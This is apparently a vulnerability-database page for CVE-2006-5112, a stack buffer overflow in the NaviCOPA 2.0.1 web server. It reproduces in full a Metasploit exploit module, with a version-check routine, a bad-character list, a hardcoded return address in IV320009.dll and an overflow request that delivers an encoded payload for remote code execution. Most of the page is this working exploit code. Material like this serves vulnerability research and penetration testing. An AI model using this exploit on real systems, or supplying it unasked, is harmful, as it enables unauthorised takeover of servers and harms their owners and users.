Lucene search

NaviCOPA 2.0.1 URL Handling Buffer Overflow

🗓️ 12 Nov 2006 15:06:55Reported by MC <[email protected]>Type

NaviCOPA 2.0.1 URL Handling Buffer Overflow, stack buffer overflow caused by boundary error in handling URL parameter

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 15
Cvelist	CVE-2006-5112	2 Oct 200620:00	–	cvelist
Cvelist	CVE-2007-1733	28 Mar 200722:00	–	cvelist
Cvelist	CVE-2007-2336	27 Apr 200716:00	–	cvelist
securityvulns	NaviCOPA Web Server buffer overflow	28 Sep 200600:00	–	securityvulns
CVE	CVE-2006-5112	3 Oct 200604:03	–	cve
CVE	CVE-2007-1733	28 Mar 200722:19	–	cve
CVE	CVE-2007-2336	27 Apr 200716:19	–	cve
Packet Storm	NaviCOPA 2.0.1 URL Handling Buffer Overflow	26 Nov 200900:00	–	packetstorm
CERT	NaviCOPA Web Server fails to properly handle certain HTTP requests	21 Nov 200600:00	–	cert
NVD	CVE-2006-5112	3 Oct 200604:03	–	nvd

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /InterVations/ ] }

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-5112' ],
          [ 'OSVDB', '29257' ],
          [ 'BID', '20250' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll
        ],
      'DisclosureDate' => '2006-09-28',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  def check
    connect

    sock.put("GET / HTTP/1.0\r\n\r\n")
    resp = sock.get_once
    disconnect

    if (resp =~ /2\.01 11th September/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit =  rand_text_alphanumeric(228, payload_badchars)
    sploit << [target.ret].pack('V') + payload.encoded

    uri = '/' + sploit

    res = "GET #{uri} HTTP/1.1\r\n\r\n"

    print_status("Trying target %s" % target.name)

    sock.put(res)
    sock.close

    handler
    disconnect
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Nov 2006 15:55Current

7.4High risk

Vulners AI Score7.4

CVSS27.5

EPSS0.75781